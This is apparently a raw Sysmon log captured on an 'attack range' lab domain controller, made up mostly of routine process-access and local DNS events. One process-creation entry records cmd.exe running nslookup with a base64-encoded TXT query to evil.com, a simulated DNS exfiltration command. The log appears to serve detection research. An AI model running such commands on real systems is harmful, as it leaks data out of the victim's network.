14:21:53.485{2E1864BB-1901-629A-9A46-000000005F02}75887736C:\Windows\system32\conhost.exe{2E1864BB-1901-629A-9B46-000000005F02}6168C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216328Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.469{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216327Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.469{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216326Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.469{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-1901-629A-9B46-000000005F02}6168C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216325Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.469{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216324Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.469{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216323Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.469{2E1864BB-1901-629A-9946-000000005F02}22364808C:\Windows\system32\cmd.exe{2E1864BB-1901-629A-9B46-000000005F02}6168C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216322Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.481{2E1864BB-1901-629A-9B46-000000005F02}6168C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1901-629A-9946-000000005F02}2236C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwkpa.tmp 2>&1 354300x8000000000000000216321Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.885{00000000-0000-0000-0000-000000000000}1736<unknown process>-udpfalsefalse127.0.0.1-51380-false127.0.0.1-53domain 354300x8000000000000000216320Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.885{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51380- 354300x8000000000000000216319Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.884{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51380- 354300x8000000000000000216318Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.884{00000000-0000-0000-0000-000000000000}1736<unknown process>-udpfalsefalse127.0.0.1-51379-false127.0.0.1-53domain 354300x8000000000000000216317Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.884{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51379- 354300x8000000000000000216316Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.884{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51379- 354300x8000000000000000216315Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.883{00000000-0000-0000-0000-000000000000}1736<unknown process>-udpfalsefalse127.0.0.1-51378-false127.0.0.1-53domain 354300x8000000000000000216314Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.883{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51378- 354300x8000000000000000216313Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.883{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51378- 354300x8000000000000000216312Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.732{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51377- 354300x8000000000000000216311Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.732{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51377- 354300x8000000000000000216310Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.732{00000000-0000-0000-0000-000000000000}7152<unknown process>-udpfalsefalse127.0.0.1-51376-false127.0.0.1-53domain 354300x8000000000000000216309Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.732{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51376- 354300x8000000000000000216308Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.732{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51376- 354300x8000000000000000216307Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.732{00000000-0000-0000-0000-000000000000}7152<unknown process>-udptruefalse127.0.0.1-51376-false127.0.0.1-53domain 354300x8000000000000000216306Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.731{00000000-0000-0000-0000-000000000000}7152<unknown process>-udpfalsefalse127.0.0.1-51375-false127.0.0.1-53domain 354300x8000000000000000216305Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.731{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51375- 354300x8000000000000000216304Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.731{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51375- 354300x8000000000000000216303Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.731{00000000-0000-0000-0000-000000000000}7152<unknown process>-udptruefalse127.0.0.1-51375-false127.0.0.1-53domain 354300x8000000000000000216302Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.618{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51374- 354300x8000000000000000216301Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.618{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51374- 354300x8000000000000000216300Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.617{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51373- 354300x8000000000000000216299Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.617{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51373- 354300x8000000000000000216298Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.616{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51372- 354300x8000000000000000216297Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.616{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51372- 10341000x8000000000000000216296Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.454{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-1901-629A-9A46-000000005F02}7588C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000216295Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.616{00000000-0000-0000-0000-000000000000}312<unknown process>-udptruefalse127.0.0.1-51372-false127.0.0.1-53domain 10341000x8000000000000000216294Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.454{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1901-629A-9A46-000000005F02}7588C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000216293Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.534{00000000-0000-0000-0000-000000000000}1240<unknown process>-udpfalsefalse127.0.0.1-51371-false127.0.0.1-53domain 354300x8000000000000000216292Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.534{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51371- 354300x8000000000000000216291Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.534{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51371- 354300x8000000000000000216290Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.534{00000000-0000-0000-0000-000000000000}1240<unknown process>-udptruefalse127.0.0.1-51371-false127.0.0.1-53domain 354300x8000000000000000216289Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.534{00000000-0000-0000-0000-000000000000}1240<unknown process>-udpfalsefalse127.0.0.1-51370-false127.0.0.1-53domain 354300x8000000000000000216288Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.534{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51370- 354300x8000000000000000216287Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.534{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51370- 354300x8000000000000000216286Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.534{00000000-0000-0000-0000-000000000000}1240<unknown process>-udptruefalse127.0.0.1-51370-false127.0.0.1-53domain 354300x8000000000000000216285Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.534{00000000-0000-0000-0000-000000000000}1240<unknown process>-udpfalsefalse127.0.0.1-51369-false127.0.0.1-53domain 354300x8000000000000000216284Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.533{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51369- 354300x8000000000000000216283Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.533{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51369- 354300x8000000000000000216282Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.533{00000000-0000-0000-0000-000000000000}1240<unknown process>-udptruefalse127.0.0.1-51369-false127.0.0.1-53domain 354300x8000000000000000216281Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.459{00000000-0000-0000-0000-000000000000}7352<unknown process>-udpfalsefalse127.0.0.1-51368-false127.0.0.1-53domain 354300x8000000000000000216280Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.459{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51368- 354300x8000000000000000216279Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.459{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51368- 354300x8000000000000000216278Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.459{00000000-0000-0000-0000-000000000000}7352<unknown process>-udptruefalse127.0.0.1-51368-false127.0.0.1-53domain 10341000x8000000000000000216277Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.438{2E1864BB-1901-629A-9A46-000000005F02}75887736C:\Windows\system32\conhost.exe{2E1864BB-1901-629A-9946-000000005F02}2236C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000216276Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.459{00000000-0000-0000-0000-000000000000}7352<unknown process>-udpfalsefalse127.0.0.1-51367-false127.0.0.1-53domain 354300x8000000000000000216275Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.459{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51367- 354300x8000000000000000216274Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.459{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51367- 354300x8000000000000000216273Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.459{00000000-0000-0000-0000-000000000000}7352<unknown process>-udptruefalse127.0.0.1-51367-false127.0.0.1-53domain 354300x8000000000000000216272Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.459{00000000-0000-0000-0000-000000000000}7352<unknown process>-udpfalsefalse127.0.0.1-51366-false127.0.0.1-53domain 354300x8000000000000000216271Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.459{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51366- 354300x8000000000000000216270Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.459{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51366- 354300x8000000000000000216269Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.459{00000000-0000-0000-0000-000000000000}7352<unknown process>-udptruefalse127.0.0.1-51366-false127.0.0.1-53domain 354300x8000000000000000216268Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.394{00000000-0000-0000-0000-000000000000}6888<unknown process>-udpfalsefalse127.0.0.1-51365-false127.0.0.1-53domain 354300x8000000000000000216267Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.394{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51365- 354300x8000000000000000216266Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.394{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51365- 354300x8000000000000000216265Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.393{00000000-0000-0000-0000-000000000000}6888<unknown process>-udptruefalse127.0.0.1-51365-false127.0.0.1-53domain 354300x8000000000000000216264Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.323{00000000-0000-0000-0000-000000000000}3868<unknown process>-udpfalsefalse127.0.0.1-51364-false127.0.0.1-53domain 354300x8000000000000000216263Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.323{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51364- 354300x8000000000000000216262Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.323{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51364- 354300x8000000000000000216261Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.323{00000000-0000-0000-0000-000000000000}3868<unknown process>-udptruefalse127.0.0.1-51364-false127.0.0.1-53domain 354300x8000000000000000216260Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.323{00000000-0000-0000-0000-000000000000}3868<unknown process>-udpfalsefalse127.0.0.1-51363-false127.0.0.1-53domain 354300x8000000000000000216259Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.323{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51363- 354300x8000000000000000216258Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.323{00000000-0000-0000-0000-000000000000}3868<unknown process>-udptruefalse127.0.0.1-51363-false127.0.0.1-53domain 354300x8000000000000000216257Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.323{00000000-0000-0000-0000-000000000000}3868<unknown process>-udpfalsefalse127.0.0.1-51362-false127.0.0.1-53domain 354300x8000000000000000216256Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.323{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51362- 354300x8000000000000000216255Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.323{00000000-0000-0000-0000-000000000000}3868<unknown process>-udptruefalse127.0.0.1-51362-false127.0.0.1-53domain 354300x8000000000000000216254Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.248{00000000-0000-0000-0000-000000000000}2060<unknown process>-udpfalsefalse127.0.0.1-51361-false127.0.0.1-53domain 354300x8000000000000000216253Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.248{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51361- 354300x8000000000000000216252Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.248{00000000-0000-0000-0000-000000000000}2060<unknown process>-udptruefalse127.0.0.1-51361-false127.0.0.1-53domain 354300x8000000000000000216251Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.247{00000000-0000-0000-0000-000000000000}2060<unknown process>-udpfalsefalse127.0.0.1-51360-false127.0.0.1-53domain 354300x8000000000000000216250Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.247{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51360- 